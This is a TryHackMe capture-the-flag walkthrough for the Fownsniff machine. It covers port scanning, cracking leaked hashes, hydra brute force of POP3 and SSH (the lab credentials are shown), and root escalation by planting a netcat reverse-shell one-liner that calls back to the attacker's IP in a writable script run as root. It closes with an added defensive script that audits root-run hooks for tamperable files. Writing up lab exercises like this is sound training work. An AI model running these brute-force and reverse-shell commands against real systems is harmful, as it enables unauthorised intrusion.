Fownsniff CTF Walkthrough - TryHackMe

Akarsh K N
Jun 21, 2021

Hello everyone, hope you guys are doing great. This is a write-up of the Fownsniff CTF.

To access the challenge visit the challenge link provided.

As usual, we connect to the challenge from TryHackMe and start solving.

Target IP: 10.10.108.117

Host IP: 10.9.178.153

Nmap scan:

Scan for open ports.

command : nmap -sS -sC -sV 10.10.108.117 -oA nmap

Ports 22, 80, 110 and 143 are open.

We have port 80 open, so we will proceed with directory scanning and checking it in the browser.

On the website there was information regarding a password leak. On searching for the @fownsniffcorp Twitter account, we found a link to a Pastebin site where we found a bunch of credentials.

command used : gobuster dir -u http://10.10.108.117 -w /usr/share/wordlists/rockyou.txt -t 60

All the passwords are hashed, so I used a hash cracker website to crack all the hashes.

I created two files: one with all the user names (user.txt) and the other with the cracked passwords (pass.txt).

I used hydra to check for valid credentials. First I checked ssh, where I could not get any results. So, I used hydra on pop3 to find valid credentials.

Command : hydra -L user.txt -P pass.txt 10.10.108.117 pop3

And we found one.

Credentials are seina:scoobydoo2

Using the found credentials, I was able to successfully log in to the POP3 mail service.

command : telnet 10.10.108.117 110

There was a mail of 1622 octets which gave a password for ssh login.

Now, adding this password to our previously created pass.txt file and using hydra on ssh, we found credentials for login.

Command : hydra -L user.txt -P pass.txt 10.10.108.117 ssh

Credentials are baskteen:Sick3nBluff+secureshell

We were able to successfully log in over ssh using the baskteen credentials.

command : ssh baskteen@10.10.108.117

Now our goal is to elevate privileges. I tried to download automation scripts for enumeration but something was blocking them. So I decided to enumerate manually. When I checked the user groups, I found a file, cube.sh, that was writable by the current user.

command: find / -group users -type f 2>/dev/null

I immediately added an nc reverse shell to cube.sh, which I grabbed from pentestmonkey. The changes I made to the script were adding the host IP 10.9.178.153 and lport 1234.

revshell: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.178.153 1234 >/tmp/f

I started a netcat listener and executed the file cube.sh hoping to get a root shell, but I was getting a reverse shell as baskteen.

I investigated further and found a file, 00-header, which is used to execute the file cube.sh as root on starting the machine.

So, I exited from the current shell, started an nc listener, and logged into baskteen again.

As expected we got the root shell. On enumerating we got the flag.txt file.
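
The root cause of this escalation is a script run as root (00-header) calling a file that a non-root group can write (cube.sh). The following audit for that condition is an added example, not part of the original write-up; the default directory /etc/update-motd.d, the TRUSTED_USER variable and the function names are assumptions made for illustration.

```sh
#!/bin/sh
# Added example (not from the write-up). Audits a directory of scripts that
# run as root and reports every file they reference that a non-root user
# could modify. Assumptions: the hooks live in /etc/update-motd.d unless a
# directory is passed, and TRUSTED_USER is the only acceptable file owner.

TRUSTED_USER=${TRUSTED_USER:-root}

# Succeeds if $1 is group- or world-writable, or not owned by TRUSTED_USER.
# -L follows symlinks so the link target's permissions are the ones judged.
is_tamperable() {
    [ -n "$(find -L "$1" -prune \( -perm -020 -o -perm -002 \
            -o ! -user "$TRUSTED_USER" \) -print 2>/dev/null)" ]
}

# Prints "hook -> file" for each tamperable file tied to a hook in $1:
# the hook itself, plus every absolute path that appears in its text.
# The body runs in a subshell so its variables stay private.
audit_hooks() (
    dir=${1:-/etc/update-motd.d}
    for hook in "$dir"/*; do
        [ -f "$hook" ] || continue
        if is_tamperable "$hook"; then
            echo "$hook -> $hook"
        fi
        grep -oE '/[A-Za-z0-9._/-]+' "$hook" | sort -u |
        while read -r ref; do
            if [ -f "$ref" ] && is_tamperable "$ref"; then
                echo "$hook -> $ref"
            fi
        done
    done
)

# Audit the real hook directory, or the directory given as the first argument.
audit_hooks "$@"
```

Any line of output is a path to fix: set the referenced file to root ownership and remove group and world write permission.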

This challenge was an easy to medium difficulty level machine, which I enjoyed solving.

Thank you everyone. I will be back with another challenge writeup.
